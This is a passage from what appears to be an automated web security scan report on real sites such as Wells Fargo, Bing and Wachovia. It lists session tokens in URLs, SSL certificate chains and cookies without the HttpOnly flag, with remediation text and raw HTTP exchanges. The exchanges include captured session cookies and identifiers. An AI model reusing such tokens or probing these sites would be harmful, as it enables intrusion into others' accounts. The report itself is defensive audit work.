Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:59:05 GMT
Date: Tue, 19 Jul 2011 01:59:05 GMT
Content-Length: 36632
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Common Symptoms of ADD & ADHD in Women - ADHD</title>
<META http-equiv="Con
...[SNIP]...
</div>
<form onsubmit="new Ajax.Request('/adhd/c/login', {asynchronous:true, evalScripts:true, method:'post', parameters:Form.serialize(this)}); return false;" method="post" action="#">
<div class="text">
...[SNIP]...
</label><input type="password" tabindex="101" size="30" name="user[password]" id="mini_home_user_password">
</div>
...[SNIP]...

6. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.bing.com
Path:   /shopping/content/cssxc.vcss

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /shopping/content/cssxc.vcss;jsessionid=4824AC5545E487AD64CBB4EB8A85C405?p=site.css&v=1.1.6.1-1287006327354 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Tue, 01 Jan 2009 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 20173
Cache-Control: public, max-age=315360000
Expires: Fri, 16 Jul 2021 12:10:22 GMT
Date: Tue, 19 Jul 2011 12:10:22 GMT
Connection: close


/* File: /site.css */

body,div,dl,dt,dd,ul,ol,li,pre,form,fieldset,input,textarea,p,blockquote,th,td{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}addre
...[SNIP]...

7. SSL certificate

There are 16 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



7.1. https://adfarm.mediaplex.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://adfarm.mediaplex.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:

The server presented the following certificate:

Issued to:  mojofarm.mediaplex.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Wed Sep 30 19:00:00 CDT 2009
Valid to:  Sat Nov 10 17:59:59 CST 2012

7.2. https://www.torservers.net/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  www.torservers.net
Issued by:  StartCom Class 1 Primary Intermediate Server CA
Valid from:  Thu Feb 17 06:25:00 CST 2011
Valid to:  Fri Feb 17 20:51:13 CST 2012

Certificate chain #1

Issued to:  StartCom Class 1 Primary Intermediate Server CA
Issued by:  StartCom Certification Authority
Valid from:  Wed Oct 24 15:54:17 CDT 2007
Valid to:  Tue Oct 24 15:54:17 CDT 2017

Certificate chain #2

Issued to:  StartCom Certification Authority
Issued by:  StartCom Certification Authority
Valid from:  Sun Sep 17 14:46:36 CDT 2006
Valid to:  Wed Sep 17 14:46:36 CDT 2036

7.3. https://www.wellsfargoadvisors.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  home.wellsfargoadvisors.com
Issued by:  Wells Fargo Certificate Authority 01
Valid from:  Tue Nov 02 10:13:36 CDT 2010
Valid to:  Fri Nov 02 10:13:36 CDT 2012

Certificate chain #1

Issued to:  Wells Fargo Certificate Authority 01
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Oct 25 05:51:54 CDT 2006
Valid to:  Fri Oct 25 05:51:03 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

7.4. https://blog.torproject.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://blog.torproject.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  blog.torproject.org
Issued by:  RapidSSL CA
Valid from:  Mon Mar 07 08:34:49 CST 2011
Valid to:  Sat Mar 09 09:24:48 CST 2013

Certificate chain #1

Issued to:  RapidSSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:45:05 CST 2010
Valid to:  Tue Feb 18 16:45:05 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

7.5. https://online.educaid.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.educaid.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  online.educaid.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Wed Dec 08 18:00:00 CST 2010
Valid to:  Fri Dec 09 17:59:59 CST 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

7.6. https://online.wellsfargo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  online.wellsfargo.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Sun Jan 30 18:00:00 CST 2011
Valid to:  Tue Jan 31 17:59:59 CST 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

7.7. https://onlineservices.wachovia.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  onlineservices.wachovia.com
Issued by:  Wells Fargo Certificate Authority 01
Valid from:  Fri Nov 05 12:53:19 CDT 2010
Valid to:  Mon Nov 05 11:53:19 CST 2012

Certificate chain #1

Issued to:  Wells Fargo Certificate Authority 01
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Oct 25 05:51:54 CDT 2006
Valid to:  Fri Oct 25 05:51:03 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

7.8. https://secure.codero.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.codero.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.codero.com
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Wed Jun 23 19:00:00 CDT 2010
Valid to:  Sat Jun 23 18:59:59 CDT 2012

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

7.9. https://secure.internode.on.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.internode.on.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.internode.on.net
Issued by:  GeoTrust DV SSL CA
Valid from:  Tue Feb 08 19:12:23 CST 2011
Valid to:  Tue Mar 12 19:56:20 CDT 2013

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 CST 2010
Valid to:  Tue Feb 25 15:32:31 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

7.10. https://secure2.internode.on.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure2.internode.on.net
Issued by:  GeoTrust DV SSL CA
Valid from:  Thu May 26 07:30:31 CDT 2011
Valid to:  Tue Jun 26 19:34:05 CDT 2012

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 CST 2010
Valid to:  Tue Feb 25 15:32:31 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

7.11. https://wellsfargo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsfargo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  wellsfargo.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Tue Apr 19 19:00:00 CDT 2011
Valid to:  Thu Apr 19 18:59:59 CDT 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

7.12. https://wellsoffice.wellsfargo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  wellsoffice.wellsfargo.com
Issued by:  Wells Fargo Certificate Authority 01
Valid from:  Mon Sep 20 22:41:54 CDT 2010
Valid to:  Thu Sep 20 22:41:54 CDT 2012

Certificate chain #1

Issued to:  Wells Fargo Certificate Authority 01
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Oct 25 05:51:54 CDT 2006
Valid to:  Fri Oct 25 05:51:03 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

7.13. https://wfefs.wellsfargo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wfefs.wellsfargo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  wfefs.wellsfargo.com
Issued by:  Wells Fargo Certificate Authority 01
Valid from:  Tue Mar 09 10:58:00 CST 2010
Valid to:  Fri Mar 09 10:58:00 CST 2012

Certificate chain #1

Issued to:  Wells Fargo Certificate Authority 01
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Oct 25 05:51:54 CDT 2006
Valid to:  Fri Oct 25 05:51:03 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

7.14. https://www.torproject.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torproject.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.torproject.org
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Feb 14 18:00:00 CST 2011
Valid to:  Fri Apr 19 18:59:59 CDT 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Thu Nov 09 18:00:00 CST 2006
Valid to:  Sun Nov 09 18:00:00 CST 2031

7.15. https://www.wachovia.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.wachovia.com
Issued by:  Wells Fargo Certificate Authority 01
Valid from:  Thu Aug 12 15:54:43 CDT 2010
Valid to:  Sun Aug 12 15:54:43 CDT 2012

Certificate chain #1

Issued to:  Wells Fargo Certificate Authority 01
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Oct 25 05:51:54 CDT 2006
Valid to:  Fri Oct 25 05:51:03 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

7.16. https://www.wellsfargo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.wellsfargo.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Tue Apr 19 19:00:00 CDT 2011
Valid to:  Thu Apr 19 18:59:59 CDT 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

8. Cookie without HttpOnly flag set
There are 40 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



8.1. https://www.wellsfargo.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.wellsfargo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/com/shareowner_services/services_for_shareholders/investment_plan/hmnfinancial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; JSESSIONID=248DE7CA98FB9058FEC7E28C47105F92; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:23 GMT
Content-type: text/html;charset=UTF-8
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-cookie: JSESSIONID=9944F37427F34CDD89C538E6A7736719;Path=/;Secure
Content-Length: 21137


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head
...[SNIP]...

8.2. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035874&rn=735981431&c7=http%3A%2F%2Fwww.healthcentral.com%2Fadhd%2Fcf%2Fslideshows%2Fcommon-symptoms-of-add-and-adhd-in-women%2Fhypersensitivity-to-noise-touch-smell%2F%3Fap%3D825&c8=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20-%20ADH&c9=http%3A%2F%2Fpaid.outbrain.com%2Fnetwork%2Fredir%3Fkey%3Dea083f1f0a8664e17286dd018ebbd632%26rdid%3D218341001%26type%3DCAD_def_prd%26in-site%3Dfalse%26pc_id%3D3389484%26req_id%3D21fd5e9603ad3d38cc44a355febaf417%26agent%3Dblog_JS_rec%26recMode%3D4%26reqType%3D1%26wid%3D1%26imgType%3D0%26version%3D40317%26idx%3D6&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 19 Jul 2011 01:58:26 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 18-Jul-2013 01:58:26 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


8.3. http://bing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: bing.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110601; SRCHD=SM=1&MS=1842502&D=1841741&AF=MSN005; MUID=3957719BE8F34A5DA51D204E7E06704A; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; _FP=; _RwBf=credit=-1&s=0; _UR=OMW=1; _SS=SID=6972CFBED6CD45B1A2140850C807FA64

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Location: http://www.bing.com/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Edge-control: no-store
Set-Cookie: _HOP=I=1&TS=1311077323; domain=bing.com; path=/
Date: Tue, 19 Jul 2011 12:08:42 GMT


8.4. http://c.atdmt.com/c.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074&RedC=c.bing.com&MXFR=1A2694B1632F60E708B59685672F60DA HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: c.atdmt.com

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.bing.com/c.gif?DI=15074&MUID=39AE9E99C74F6BF03BB69CADC34F6B13&cb=1cc460cb9062000
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=39AE9E99C74F6BF03BB69CADC34F6B13; domain=.atdmt.com; expires=Sat, 04-Feb-2012 12:09:34 GMT; path=/;
Date: Tue, 19 Jul 2011 12:09:34 GMT
Content-Length: 0


8.5. http://c.bing.com/c.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: c.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=20C55B5B3C8E668525A1596F388E6676
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=20C55B5B3C8E668525A1596F388E6676&TUID=1; domain=.bing.com; expires=Sat, 04-Feb-2012 12:09:33 GMT; path=/;
Date: Tue, 19 Jul 2011 12:09:32 GMT
Content-Length: 0


8.6. http://odb.outbrain.com/utils/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.healthcentral.com%2Fadhd%2Fcf%2Fslideshows%2Fcommon-symptoms-of-add-and-adhd-in-women%2Fhypersensitivity-to-noise-touch-smell%2F%3Fap%3D825&settings=true&recs=true&widgetJSId=AR_2&key=AYQHSUWJ8576&idx=0&version=40317&ref=http%3A%2F%2Fpaid.outbrain.com%2Fnetwork%2Fredir%3Fkey%3Dea083f1f0a8664e17286dd018ebbd632%26rdid%3D218341001%26type%3DCAD_def_prd%26in-site%3Dfalse%26pc_id%3D3389484%26req_id%3D21fd5e9603ad3d38cc44a355febaf417%26agent%3Dblog_JS_rec%26recMode%3D4%26reqType%3D1%26wid%3D1%26imgType%3D0%26version%3D40317%26idx%3D6&apv=false&rand=0.27036919072270393&sig=yiATPu1V HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
